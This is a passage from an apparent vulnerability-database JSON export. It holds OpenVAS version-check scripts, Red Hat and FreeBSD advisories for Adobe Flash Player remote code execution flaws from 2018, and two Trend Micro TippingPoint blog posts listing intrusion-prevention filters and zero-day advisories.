value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities(apsb18-05)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow an attacker to execute arbitrary code on affected system and take\n control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier within Google Chrome on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:14:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2018-02-02T00:00:00", "id": "OPENVAS:1361412562310812687", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812687", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812687\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 11:10:37 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.137 and\n earlier within Google Chrome on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.161, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.161\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:14:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2018-02-02T00:00:00", "id": "OPENVAS:1361412562310812685", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812685", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812685\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 11:04:01 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.137 and\n earlier on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.161, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.161\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:14:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2018-02-02T00:00:00", "id": "OPENVAS:1361412562310812683", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812683", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812683\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 10:51:19 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.137 and\n earlier on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.161, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.161\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-05-29T14:35:12", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 29.0.0.113.\n\nSecurity Fix(es):\n\n* flash-plugin: Use After Free - remote code execution vulnerability (APSB18-05) (CVE-2018-4919)\n\n* flash-plugin: Type Confusion - remote code execution vulnerability (APSB18-05) (CVE-2018-4920)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-06-07T18:21:40", "published": "2018-03-14T18:23:40", "id": "RHSA-2018:0520", "href": "https://access.redhat.com/errata/RHSA-2018:0520", "type": "redhat", "title": "(RHSA-2018:0520) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:57", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.161.\n\nSecurity Fix(es):\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player. These vulnerabilities, detailed in the Adobe Security Bulletin listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to crash, execute arbitrary code, or disclose sensitive information when the victim loaded a page containing the malicious SWF content. (CVE-2018-4877, CVE-2018-4878)", "modified": "2018-06-07T18:21:50", "published": "2018-02-07T22:47:53", "id": "RHSA-2018:0285", "href": "https://access.redhat.com/errata/RHSA-2018:0285", "type": "redhat", "title": "(RHSA-2018:0285) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11305", "CVE-2018-4871"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.137.\n\nSecurity Fix(es):\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player. These vulnerabilities, detailed in the Adobe Security Bulletins listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to disclose sensitive information or modify its settings when the victim loaded a page containing the malicious SWF content. (CVE-2017-11305, CVE-2018-4871)", "modified": "2018-06-07T18:21:41", "published": "2018-01-11T01:44:27", "id": "RHSA-2018:0081", "href": "https://access.redhat.com/errata/RHSA-2018:0081", "type": "redhat", "title": "(RHSA-2018:0081) Important: flash-plugin security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:58", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "description": "\nAdobe reports:\n\n\nThis update resolves a use-after-free vulnerability that\n\t could lead to remote code execution (CVE-2018-4919).\nThis update resolves a type confusion vulnerability that\n\t could lead to remote code execution (CVE-2018-4920).\n\n\n", "edition": 5, "modified": "2018-03-13T00:00:00", "published": "2018-03-13T00:00:00", "id": "313078E3-26E2-11E8-9920-6451062F0F7A", "href": "https://vuxml.freebsd.org/freebsd/313078e3-26e2-11e8-9920-6451062f0f7a.html", "title": "Flash Player -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "description": "\nAdobe reports:\n\n\nThis update resolves use-after-free vulnerabilities that\n\t could lead to remote code execution (CVE-2018-4877,\n\t CVE-2018-4878).\n\n\n", "edition": 5, "modified": "2018-01-31T00:00:00", "published": "2018-01-31T00:00:00", "id": "756A8631-0B84-11E8-A986-6451062F0F7A", "href": "https://vuxml.freebsd.org/freebsd/756a8631-0b84-11e8-a986-6451062f0f7a.html", "title": "Flash Player -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:03", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4871"], "description": "\nAdobe reports:\n\n\nThis update resolves an out-of-bounds read vulnerability that\n\t could lead to information disclosure (CVE-2018-4871).\n\n\n", "edition": 5, "modified": "2018-01-09T00:00:00", "published": "2018-01-09T00:00:00", "id": "9C016563-F582-11E7-B33C-6451062F0F7A", "href": "https://vuxml.freebsd.org/freebsd/9c016563-f582-11e7-b33c-6451062f0f7a.html", "title": "Flash Player -- information disclosure", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "trendmicroblog": [{"lastseen": "2018-03-23T15:44:34", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "description": "\n\nBack in 2005, there were a number of us in a conference room in Austin, Texas working to determine how we would structure it, what we would name it, and how to deal with the potential backlash that would come after we announced it. What is it? I\u2019m referring to our Zero Day Initiative. It\u2019s been a long journey for the team working to gain the trust of not only vendors in various industries, but also the security researcher community. By promoting responsible disclosure of vulnerabilities, the Zero Day Initiative (ZDI) has grown to become a significant influencer on the importance of security in the product development lifecycle and a deterrent to the black market.\n\nIn addition to being the largest bug bounty program in the world, the ZDI is also the leader in global vulnerability research and discovery. Frost & Sullivan\u2019s report, \u201c[Analysis of the Global Public Vulnerability Research Market, 2017](<https://www.trendmicro.com/content/dam/trendmicro/global/en/business/products/network/integrated-atp/vulnerability-tracker-feb-2018.pdf>),\u201d highlights the vulnerability landscape and the key public vulnerability reporting agencies. Out of the 1,522 vulnerabilities counted in the report, the ZDI publicly disclosed 66.3% of them! For more information on ZDI and statistics from the report, download this [infographic](<https://www.trendmicro.com/content/dam/trendmicro/global/en/business/products/network/zdi-infographic-2018.pdf>).\n\n**Adobe Security Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before March 13, 2018. The following table maps Digital Vaccine filters to the Adobe updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [March 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/3/13/the-march-2018-security-update-review>) from the Zero Day Initiative:\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB18-05 | CVE-2018-4919 | 30701 | \nAPSB18-05 | CVE-2018-4920 | 30699 | \n \n \n\n**Planned Maintenance Window**\n\nThe Trend Micro TippingPoint Threat Management Center (TMC) web site (<https://tmc.tippingpoint.com>) will be undergoing maintenance on the following date and time:\n\n**Date** | **From** | **To** \n---|---|--- \nSunday, April 8, 2018 | 9:00AM (CDT) | 10:00AM (CDT) \n2:00PM (UTC) | 3:00PM (UTC) \n \n \n\nDuring the maintenance window, the Security Management System (SMS), Intrusion Prevention System (IPS), Next Generation Firewall (NGFW) and Threat Protection System (TPS) connectivity to the TMC will be disrupted, thus preventing the Digital Vaccine (DV), Threat Digital Vaccine (ThreatDV), Reputation Security Monitor (RepSM) and TippingPoint Operating System (TOS) updates from occurring. Customers with any questions or concerns can [contact](<https://tmc.tippingpoint.com/TMC/Support?parentFolderId=support&contentId=Support_Contacts>) the TippingPoint Technical Assistance Center.\n\n**Zero-Day Filters**\n\nThere are 22 new zero-day filters covering 10 vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_AlienVault (1)_**\n\n| \n\n * 30685: HTTPS: AlienVault USM and OSSIM get_directive_kdb.php SQL Injection Vulnerability (ZDI-16-505) \n---|--- \n| \n \n**_Apple (4)_**\n\n| \n\n * 30810: ZDI-CAN-5812: Zero Day Initiative Vulnerability (Apple Safari)\n * 30815: PWN2OWN ZDI-CAN-5819: Zero Day Initiative Vulnerability (Apple Safari)\n * 30820: ZDI-CAN-5825: Zero Day Initiative Vulnerability (Apple Safari)\n * 30821: PWN2OWN ZDI-CAN-5827: Zero Day Initiative Vulnerability (Apple Safari) \n---|--- \n| \n \n**_EMC (2)_**\n\n| \n\n * 30718: TCP: EMC AutoStart ftagent Opcode 20 Subcode 2219 Command Execution Vulnerability (ZDI-15-172)\n * 30720: TCP: EMC AutoStart ftagent Opcode 20 Subcode 2060 Command Execution Vulnerability (ZDI-15-171) \n---|--- \n| \n \n**_Hewlett Packard Enterprise (2)_**\n\n| \n\n * 30695: HTTPS: HPE Vertica validateAdminConfig Command Injection Vulnerability (ZDI-16-244)\n * 30738: HTTP: HP Sprinter ActiveX Instantiation Buffer Overflow Vulnerability(ZDI-14-359) \n---|--- \n| \n \n**_Microsoft (2)_**\n\n| \n\n * 30811: PWN2OWN ZDI-CAN-5814: Zero Day Initiative Vulnerability (Microsoft Edge)\n * 30812: PWN2OWN ZDI-CAN-5815: Zero Day Initiative Vulnerability (Microsoft Edge) \n---|--- \n| \n \n**_Mozilla (2)_**\n\n| \n\n * 30817: PWN2OWN ZDI-CAN-5822: Zero Day Initiative Vulnerability (Mozilla Firefox)\n * 30818: ZDI-CAN-5824: Zero Day Initiative Vulnerability (Mozilla Firefox) \n---|--- \n| \n \n**_Oracle (2)_**\n\n| \n\n * 30722: HTTP: Oracle Data Quality Trillium Based SetEntities Type Confusion Vulnerability (ZDI-15-105)\n * 30724: HTTP: Oracle Data Quality LoaderWizard DataPreview Type Confusion Vulnerability (ZDI-15-103) \n---|--- \n| \n \n**_Panasonic (2)_**\n\n| \n\n * 30726: HTTP: Panasonic Security API SDK ActiveX FilePassword Memory Corruption Vulnerability (ZDI-15-260)\n * 30742: HTTP: Panasonic Security API SDK Buffer Overflow Vulnerability (ZDI-15-261) \n---|--- \n| \n \n**_Schneider Electric (4)_**\n\n| \n\n * 30709: HTTP: Schneider Electric ProClima F1BookView Buffer Overflow Vulnerability (ZDI-15-634)\n * 30714: HTTP: Schneider Electric ProClima F1BookView CopyRangeEx Memory Corruption Vulnerability(ZDI-15-629)\n * 30715: HTTP: Schneider Electric ProClima F1BookView AttachToSS Memory Corruption Vulnerability (ZDI-15-628)\n * 30716: HTTP: Schneider Electric ProClima F1BookView CopyRange SwapTables Memory Corruption (ZDI-15-627) \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 30684: HTTPS: Trend Micro Control Manager task_controller Information Disclosure Vulnerability (ZDI-16-462) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-march-12-2018/>).\n\nThe post [TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of March 19, 2018](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-march-19-2018/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2018-03-23T15:05:44", "published": "2018-03-23T15:05:44", "id": "TRENDMICROBLOG:611E1E590AEA0D73DBB760324065E09C", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-march-19-2018/", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of March 19, 2018", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-02-09T18:09:23", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0101", "CVE-2018-4877", "CVE-2018-4878", "CVE-2018-6389"], "description": "\n\nIt was a busy week in the cyber security world, but it shouldn\u2019t be surprising given that the 2018 Winter Olympics in Pyeongchang have begun. I shouldn\u2019t blame just the Olympics, but it\u2019s hard not to given the international focus, controversy around the ban of certain athletes and its proximity to a certain country. So let\u2019s jump right in\u2026\n\n**Adobe Flash Player**\n\nEarlier this week, Adobe released a critical security update for a pair of vulnerabilities in Flash Player, one of which has been actively exploited in phishing attacks attributed to North Korean APT actor Group 123. Both bugs are classified as use-after-free vulnerabilities that can result in remote code execution. The vulnerability that is being actively exploited (CVE-2018-4878) was found by Kr-CERT/CC, South Korea's national computer emergency response team. The other vulnerability (CVE-2018-4877) came through our Zero Day Initiative via \"bo13oy\" of Qihoo 360's Vulcan Team.\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for the Adobe Flash vulnerabilities. The following table maps Digital Vaccine filters to the Adobe updates:\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB18-03 | CVE-2018-4877 | 30346 | \nAPSB18-03 | CVE-2018-4878 | 30343 | \n \n \n\n**WordPress \u201cload-script\u201d Usage Vulnerability**\n\nOn Tuesday, we released DVToolkit CSW file CVE-2018-6389.csw for the WordPress \u201cload-script\u201d usage vulnerability. This filter detects usage of load-scripts.php in WordPress. The load-scripts.php is a built-in script in WordPress that processes user-defined requests. Due to insufficient validation, any user can send large amounts of requests for processing which could cause system resource exhaustion and result in a denial-of-service condition. User authentication is not required to exploit this vulnerability. Customers using TippingPoint solutions should note that the CSW filter will be obsoleted by DV filter 30356.\n\n**Cisco ASA WebVPN Host Scan Memory Corruption Vulnerability**\n\nWe also released DVToolkit CSW file CVE-2018-0101.csw for the Cisco ASA WebVPN Host Scan Memory Corruption Vulnerability. This filter detects an attempt to exploit a memory corruption vulnerability in the Cisco Adaptive Security Appliance (ASA). The specific flaw is due to a failure to properly allocate memory when parsing the host-scan-reply tag. An attacker can leverage this vulnerability to execute arbitrary code in the context of the process. Authentication is not required to exploit this vulnerability. Customers using TippingPoint solutions should note that the CSW filter will be obsoleted by DV filter 30369.\n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering five vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Foxit (6)_**\n\n| \n\n * 30318: ZDI-CAN-5312: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30319: ZDI-CAN-5370,5372: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30333: ZDI-CAN-5371: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30335: ZDI-CAN-5373: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30337: ZDI-CAN-5374: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30338: ZDI-CAN-5375: Zero Day Initiative Vulnerability (Foxit Reader) \n---|--- \n| \n \n**_Hewlett Packard Enterprise (2)_**\n\n| \n\n * 30308: HTTP: HPE Moonshot Provisioning Manager Appliance khuploadfile.cgi Directory Traversal (ZDI-18-001)\n * 30309: HTTPS: HPE Moonshot Provisioning Manager Appliance khuploadfile.cgi Directory Traversal (ZDI-18-001) \n---|--- \n| \n \n**_Microsoft (1)_**\n\n| \n\n * 30330: ZDI-CAN-5369: Zero Day Initiative Vulnerability (Microsoft Internet Explorer) \n---|--- \n| \n \n**_Quest (1)_**\n\n| \n\n * 28124: HTTP: Quest NetVault Backup Multipart Request Header Buffer Overflow Vulnerability (ZDI-18-004) \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 30311: HTTPS: Trend Micro Mobile Security for Enterprise SQL Injection (ZDI-17-782) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-january-29-2018/>).", "modified": "2018-02-09T16:55:38", "published": "2018-02-09T16:55:38", "id": "TRENDMICROBLOG:08ADD009C78AC2B7B49C47D2673AD447", "href": 